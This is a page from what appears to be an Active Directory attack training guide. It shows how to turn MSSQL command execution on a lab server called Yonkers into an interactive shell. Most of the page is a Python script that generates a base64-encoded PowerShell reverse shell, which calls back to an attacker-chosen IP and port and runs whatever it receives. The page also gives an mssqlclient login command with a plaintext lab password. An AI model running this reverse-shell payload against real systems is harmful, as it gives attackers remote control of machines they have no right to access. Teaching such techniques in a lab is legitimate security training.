> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/mssql-servers-exploitation/mssql-command-execution-to-shell-yonkers.md).

# MSSQL Command execution to shell - Yonkers

* We got command execution on Yonkers and also on Salisbury. But now we want a shell to interact with the server.

```
#!/usr/bin/env python3
import base64
import sys

if len(sys.argv) < 3:
  print(('usage : %s ip port' % sys.argv[0]))
  sys.exit(0)

payload="""
$c = New-Object System.Net.Sockets.TCPClient('%s',%s);
$s = $c.GetStream();[byte[]]$b = 0..65535|%%{0};
while(($i = $s.Read($b, 0, $b.Length)) -ne 0){
    $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);
    $sb = (iex $d 2>&1 | Out-String );
    $sb = ([text.encoding]::ASCII).GetBytes($sb + 'ps> ');
    $s.Write($sb,0,$sb.Length);
    $s.Flush()
};
$c.Close()
""" % (sys.argv[1], sys.argv[2])

byte = payload.encode('utf-16-le')
b64 = base64.b64encode(byte)
print(("powershell -exec bypass -enc %s" % b64.decode()))

```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FzUlschIPWpI38dSq9Muj%2Fimage.png?alt=media&amp;token=d8e729dc-802f-43e7-ba0a-3b1a010018d4" alt=""><figcaption></figcaption></figure>

* run it and get a shell

```sh
mssqlclient.py -windows-auth north.newyork.local/elena.lopez:princesa1@yonkers.north.newyork.local
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FZaNwUd9cJVAypYNPa69g%2Fimage.png?alt=media&amp;token=2d39b500-005c-4e26-8946-f4f71909e775" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FJYfURnGLGhxiFIBIFThZ%2Fimage.png?alt=media&amp;token=2dee9b04-f5c4-424a-8b43-6c4561ccb2db" alt=""><figcaption></figcaption></figure>
